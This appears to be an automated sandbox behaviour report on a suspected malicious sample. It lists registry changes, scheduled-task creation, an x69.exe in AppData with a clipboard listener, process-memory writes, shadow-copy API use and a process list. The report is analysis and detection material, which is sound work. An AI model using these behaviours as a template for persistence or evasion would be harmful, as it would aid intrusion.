| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\d99f01ab_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | C:\Windows\System32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={63A21001-DC59-4210-ABDB-A980EF09886A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1747714452" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecision = "0" | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 20 May 2025 04:14:12 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\76-c4-75-2d-b8-0a\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "3" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 | C:\Windows\Explorer.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5000310000000000995a4d6f100041646d696e003c0009000400efbe995af166b45a8f212e000000d20501000000040000000000000000000000000000005efbe900410064006d0069006e00000014000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 7800310000000000995af1661100557365727300640009000400efbe874f7748b45a8f212e000000fd0100000000010000000000000000003a00000000000ba6c40055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\Explorer.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "2" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe110000009a627c54e1b5db01a46ba08b3dc9db01ee4eef8b3dc9db0114000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5600310000000000b45ab12110005443505669657700400009000400efbeb45ab021b45ab1212e00000050820200000009000000000000000000000000000000c20015015400430050005600690065007700000016000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3938609630-3351998637-1751884608-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 8400310000000000b45aac211100444f574e4c4f7e3100006c0009000400efbe995af166b45aac212e000000f3050100000002000000000000000000420000000000354c660044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 | C:\Windows\Explorer.EXE | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\Downloads\TCPView.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\TCPView\tcpview64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
| Image path | Command line |
|---|---|
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc |
| C:\Windows\system32\dwm.exe | "dwm.exe" |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer |
| C:\Windows\sysmon.exe | C:\Windows\sysmon.exe |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService |
